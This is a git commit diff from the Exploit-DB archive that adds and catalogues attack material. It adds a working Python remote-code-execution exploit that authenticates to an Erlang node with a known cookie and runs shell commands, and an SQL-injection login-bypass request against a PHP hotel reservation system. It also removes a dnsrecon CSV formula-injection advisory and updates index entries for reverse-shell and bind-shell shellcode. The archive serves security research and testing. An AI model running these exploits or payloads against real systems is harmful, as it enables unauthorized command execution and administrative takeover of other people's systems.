DB: 2021-01-14
4 changes to exploits/shellcodes dnsrecon 0.10.0 - CSV Injection Erlang Cookie - Remote Code Execution Online Hotel Reservation System 1.0 - Admin Authentication Bypass Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes) Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes) Linux/x64 - Reverse TCP Stager Shellcode (188 bytes) Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes) Linux/x86 - bind shell on port 13377 Shellcode (65 bytes) Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)
This commit is contained in:
Offensive Security
parent
91f4f8025d
commit
f8d41df29f
5 changed files with 88 additions and 41 deletions
67
exploits/multiple/remote/49418.py
Executable file
67
exploits/multiple/remote/49418.py
Executable file
|
|
@ -0,0 +1,67 @@
|
|||
# Exploit Title: Erlang Cookie - Remote Code Execution
|
||||
# Date: 2020-05-04
|
||||
# Exploit Author: 1F98D
|
||||
# Original Author: Milton Valencia (wetw0rk)
|
||||
# Software Link: https://www.erlang.org/
|
||||
# Version: N/A
|
||||
# Tested on: Debian 9.11 (x64)
|
||||
# References:
|
||||
# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/
|
||||
#
|
||||
# Erlang allows distributed Erlang instances to connect and remotely execute commands.
|
||||
# Nodes are permitted to connect to eachother if they share an authentication cookie,
|
||||
# this cookie is commonly called ".erlang.cookie"
|
||||
#
|
||||
#!/usr/local/bin/python3
|
||||
|
||||
import socket
|
||||
from hashlib import md5
|
||||
import struct
|
||||
import sys
|
||||
|
||||
TARGET = "192.168.1.1"
|
||||
PORT = 25672
|
||||
COOKIE = "XXXXXXXXXXXXXXXXXXXX"
|
||||
CMD = "whoami"
|
||||
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((TARGET, PORT))
|
||||
|
||||
name_msg = b"\x00"
|
||||
name_msg += b"\x15"
|
||||
name_msg += b"n"
|
||||
name_msg += b"\x00\x07"
|
||||
name_msg += b"\x00\x03\x49\x9c"
|
||||
name_msg += b"AAAAAA@AAAAAAA"
|
||||
|
||||
s.send(name_msg)
|
||||
s.recv(5) # Receive "ok" message
|
||||
challenge = s.recv(1024) # Receive "challenge" message
|
||||
challenge = struct.unpack(">I", challenge[9:13])[0]
|
||||
|
||||
print("Extracted challenge: {}".format(challenge))
|
||||
|
||||
challenge_reply = b"\x00\x15"
|
||||
challenge_reply += b"r"
|
||||
challenge_reply += b"\x01\x02\x03\x04"
|
||||
challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest()
|
||||
|
||||
s.send(challenge_reply)
|
||||
challenge_res = s.recv(1024)
|
||||
if len(challenge_res) == 0:
|
||||
print("Authentication failed, exiting")
|
||||
sys.exit(1)
|
||||
|
||||
print("Authentication successful")
|
||||
|
||||
ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex"
|
||||
msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k'
|
||||
msg += struct.pack(">H", len(CMD))
|
||||
msg += bytes(CMD, 'ascii')
|
||||
msg += b'jw\x04user'
|
||||
|
||||
payload = b'\x70' + ctrl + msg
|
||||
payload = struct.pack('!I', len(payload)) + payload
|
||||
print("Sending cmd: '{}'".format(CMD))
|
||||
s.send(payload)
|
||||
print(s.recv(1024))
|
||||
16
exploits/php/webapps/49420.txt
Normal file
16
exploits/php/webapps/49420.txt
Normal file
|
|
@ -0,0 +1,16 @@
|
|||
# Exploit Title: Online Hotel Reservation System 1.0 - Admin Authentication Bypass
|
||||
# Exploit Author: Richard Jones
|
||||
# Date: 2021-01-13
|
||||
# Vendor Homepage: https://www.sourcecodester.com/php/13492/online-hotel-reservation-system-phpmysqli.html
|
||||
# Software Link: https://www.sourcecodester.com/download-code?nid=13492&title=Online+Hotel+Reservation+System+in+PHP%2FMySQLi+with+Source+Code
|
||||
# Version: 1.0
|
||||
# Tested On: Windows 10 Home 19041 (x64_86) + XAMPP 7.2.34
|
||||
|
||||
#Exploit URL: http://TARGET/marimar/admin/index.php
|
||||
Host: TARGET
|
||||
POST /marimar/admin/login.php HTTP/1.1
|
||||
Content-Length: 57
|
||||
Connection: close
|
||||
Cookie: PHPSESSID=82sevuai2qhh9h8b5jbucn0616
|
||||
|
||||
email=admin%27+or+1%3D1+--+-ac1d&pass=asdasdasd&btnlogin=
|
||||
|
|
@ -1,37 +0,0 @@
|
|||
# Exploit Title: dnsrecon 0.10.0 - CSV Injection
|
||||
# Author: Dolev Farhi
|
||||
# Date: 2021-01-07
|
||||
# Vendor Homepage: https://github.com/darkoperator/dnsrecon/
|
||||
# Version : 0.10.0
|
||||
# Tested on: ParrotOS 4.10
|
||||
|
||||
dnsrecon, when scanning a TXT record such as SPF, i.e.: _spf.domain.com, outputs a CSV report (-c out.csv) with entries such as Type,Name,Address,Target,Port and String.
|
||||
A TXT record allows many characters including single quote and equal signs, it's possible to escape the CSV structure by creating a TXT record in the following way:
|
||||
|
||||
_spf.example.com "test',=1+1337,'z"
|
||||
|
||||
|
||||
user@parrot-virtual:~$ sudo dnsrecon -d _spf.example.com -c ./file.csv -n 8.8.8.8
|
||||
[*] Performing General Enumeration of Domain: _spf.example.com
|
||||
[-] DNSSEC is not configured for _spf.example.com
|
||||
[*] SOA ns-59.awsdns-07.com 205.1.1.1
|
||||
[-] Could not Resolve NS Records for _spf.example.com
|
||||
[-] Could not Resolve MX Records for _spf.example.com
|
||||
[*] TXT _spf.example.com test',=1+1337,'z
|
||||
[*] Enumerating SRV Records
|
||||
[+] 0 Records Found
|
||||
[*] Saving records to CSV file: ./file.csv
|
||||
{'type': 'SOA', 'mname': 'ns-59.awsdns-07.com', 'address': '205.1.1.1'}
|
||||
{'type': 'TXT', 'name': '_spf.example.com', 'strings': "test',=1+1337,'z"}
|
||||
|
||||
|
||||
This output will then be rewritten into a CSV with this structure:
|
||||
|
||||
Type,Name,Address,Target,Port,String
|
||||
SOA,ns-59.awsdns-07.com,205.1.1.1
|
||||
TXT,_spf.example.com,,,,'test',=1+1337,'z'
|
||||
|
||||
The flexibility of TXT record allows many variants of formulas to be injected, from RFC1464 https://tools.ietf.org/html/rfc1464:
|
||||
|
||||
Attribute Values
|
||||
All printable ASCII characters are permitted in the attribute value.
|
||||
|
|
@ -11243,7 +11243,6 @@ id,file,description,date,author,type,platform,port
|
|||
49379,exploits/windows/local/49379.txt,"WinAVR Version 20100110 - Insecure Folder Permissions",2021-01-06,"Mohammed Alshehri",local,windows,
|
||||
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",2021-01-06,1F98D,local,windows,
|
||||
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",2021-01-06,1F98D,local,java,
|
||||
49394,exploits/python/local/49394.txt,"dnsrecon 0.10.0 - CSV Injection",2021-01-08,"Dolev Farhi",local,python,
|
||||
49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",2021-01-11,rootabeta,local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
|
|
@ -18355,6 +18354,7 @@ id,file,description,date,author,type,platform,port
|
|||
49217,exploits/windows/remote/49217.py,"Dup Scout Enterprise 10.0.18 - 'sid' Remote Buffer Overflow (SEH)",2020-12-09,"Andrés Roldán",remote,windows,
|
||||
49218,exploits/windows/remote/49218.txt,"Huawei HedEx Lite 200R006C00SPC005 - Path Traversal",2020-12-09,Vulnerability-Lab,remote,windows,
|
||||
49261,exploits/solaris/remote/49261.c,"Solaris SunSSH 11.0 x86 - libpam Remote Root",2020-12-15,"Hacker Fantastic",remote,solaris,
|
||||
49418,exploits/multiple/remote/49418.py,"Erlang Cookie - Remote Code Execution",2021-01-13,1F98D,remote,multiple,
|
||||
6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|
@ -43619,3 +43619,4 @@ id,file,description,date,author,type,platform,port
|
|||
49412,exploits/php/webapps/49412.py,"Gila CMS 2.0.0 - Remote Code Execution (Unauthenticated)",2021-01-12,Enesdex,webapps,php,
|
||||
49413,exploits/php/webapps/49413.txt,"Cemetry Mapping and Information System 1.0 - Multiple SQL Injections",2021-01-12,"Mesut Cetin",webapps,php,
|
||||
49415,exploits/multiple/webapps/49415.py,"SmartAgent 3.1.0 - Privilege Escalation",2021-01-12,"Orion Hridoy",webapps,multiple,
|
||||
49420,exploits/php/webapps/49420.txt,"Online Hotel Reservation System 1.0 - Admin Authentication Bypass",2021-01-13,"Richard Jones",webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
|
|
@ -1005,10 +1005,10 @@ id,file,description,date,author,type,platform
|
|||
47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86
|
||||
47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
|
||||
47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
|
||||
47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
|
||||
47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Byte Free Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86
|
||||
47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86
|
||||
47564,shellcodes/linux_x86/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86
|
||||
47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
|
||||
47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse (192.168.55.42:443/TCP) Shell + Stager + Null-Byte Free Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64
|
||||
47877,shellcodes/linux_x86/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86
|
||||
47890,shellcodes/linux_x86/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86
|
||||
47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows
|
||||
|
|
@ -1025,4 +1025,4 @@ id,file,description,date,author,type,platform
|
|||
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
|
||||
48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
|
||||
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download using mshta.exe Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
|
||||
49416,shellcodes/linux/49416.txt,"Linux/x86 - bind shell on port 13377 Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
|
||||
49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
|
||||
|
|
|
|||
|
Loading…
Add table
Reference in a new issue